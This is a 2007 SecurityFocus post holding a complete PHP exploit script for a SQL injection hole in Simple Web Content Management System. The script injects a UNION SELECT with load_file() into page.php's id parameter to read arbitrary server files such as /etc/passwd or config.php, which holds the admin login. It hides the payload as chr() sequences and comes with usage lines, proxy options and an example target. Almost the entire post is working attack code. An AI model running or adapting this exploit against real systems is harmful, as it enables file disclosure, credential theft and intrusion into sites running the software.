Simple Web Content Management System SQL Injection Exploit Jan 03 2007 09:15AM
gmdarkfig gmail com
#!/usr/bin/php
<?php

/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");

if($argc < 3) {
print("
--------------------------------------------------------
Affected.scr..: Simple Web Content Management System
Poc.ID........: 18070102
Type..........: SQL Injection
Risk.level....: Medium
Src.download..: www.cms-center.com
Poc.link......: acid-root.new.fr/poc/18070102.txt
Credits.......: DarkFig
--------------------------------------------------------
Usage.........: php xpl.txt <url> <file>
Options.......: <proxhost:proxport> <proxuser:proxpass>
Example.......: php xpl.txt http://hihi.org/ /etc/passwd
--------------------------------------------------------\n");
exit(1);
}

$url =$argv[1];$file =$argv[2];
$proxh=$argv[3];$proxa=$argv[4];

$xpl = new phpsploit();
$xpl->agent("Mozilla");
if($proxh) $xpl->proxy($proxh);
if($proxa) $xpl->proxyauth($proxa);

/*
* $id = $_GET['id'];
* $query = "SELECT * from content WHERE id = $id";
* ...
* @return $row->text;
*
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
* What we want is not in the database, it's in a file (config.php):
*
* //this are the logins for the admin part. Change them for security.
* $login = "test"; //your login for the admin section.
* $pass = "1234"; //your login for the admin section.
*
* PS: Les chr() ont été utilisés dans le but de se foutre de
* la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =).
*
*/

$header =
chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).ch
r(0x0d).
chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch
r(0x0d).
chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).ch
r(0x3e).
chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).ch
r(0x66).
chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).ch
r(0x74).
chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).ch
r(0x3c).
chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).ch
r(0x65).
chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).ch
r(0x79).
chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).ch
r(0x20).
chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).ch
r(0x79).
chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).ch
r(0x22).
chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).ch
r(0x74).
chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).ch
r(0x73).
chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).ch
r(0x74).
chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).ch
r(0x65).
chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).ch
r(0x6f).
chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).ch
r(0x79).
chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).ch
r(0x74).
chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).ch
r(0x78).
chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).ch
r(0x3b).
chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).ch
r(0x74).
chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).ch
r(0x35).
chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).ch
r(0x3c).
chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch
r(0x0d).
chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).ch
r(0x79).
chr(0x3e).chr(0x2f);

$sql =
chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).ch
r(0x70).
chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).ch
r(0x2a).
chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).ch
r(0x2f).
chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).ch
r(0x63).
chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).ch
r(0x6c).
chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).ch
r(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch
r(0x6c).
chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).ch
r(0x69).
chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).ch
r(0x61).
chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).ch
r(0x6e).
chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch
r(0x6c).
chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c);

$footer =
chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).ch
r(0x79).
chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).ch
r(0x74).
chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f);

$xpl->get($url.$sql);
$ct = preg_replace($footer,'',$xpl->getcontent());
print preg_replace($header,'',$ct);

function concatcharfu($file)
{
$dat = '';
for($i=0;$i<strlen($file);$i++)
{
$dat .= 'char('.ord($file[$i]).')';
if($i != (strlen($file)-1)) $dat .= ',';
}
return $dat;
}

?>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus